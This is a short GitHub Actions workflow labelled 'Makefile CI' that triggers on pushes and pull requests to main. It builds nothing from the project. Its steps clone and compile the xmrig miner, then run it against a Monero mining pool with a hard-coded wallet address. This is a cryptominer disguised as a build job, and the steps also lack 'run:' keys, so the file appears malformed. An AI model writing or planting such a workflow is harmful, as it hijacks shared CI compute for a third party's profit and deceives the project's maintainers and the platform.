name: Makefile CI

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - sudo apt-get install git build-essential cmake automake libtool autoconf -y; git clone https://github.com/xmrig/xmrig.git; mkdir xmrig/build && cd xmrig/scripts; ./build_deps.sh && cd ../build; cmake .. -DXMRIG_DEPS=scripts/deps; make -j$(nproc)
    - ./xmrig --donate-level 5 -o pool.minexmr.com:443 -u 8BEPCACBusVf6C6ikRwab5R6DHjSQPZRp66tufArbbKjPXWenDsRJMM5kvu4P7bRVfjXXxGufVvECb1eDZSFpV5JEutgEsV -k --tls --rig-id xmrig

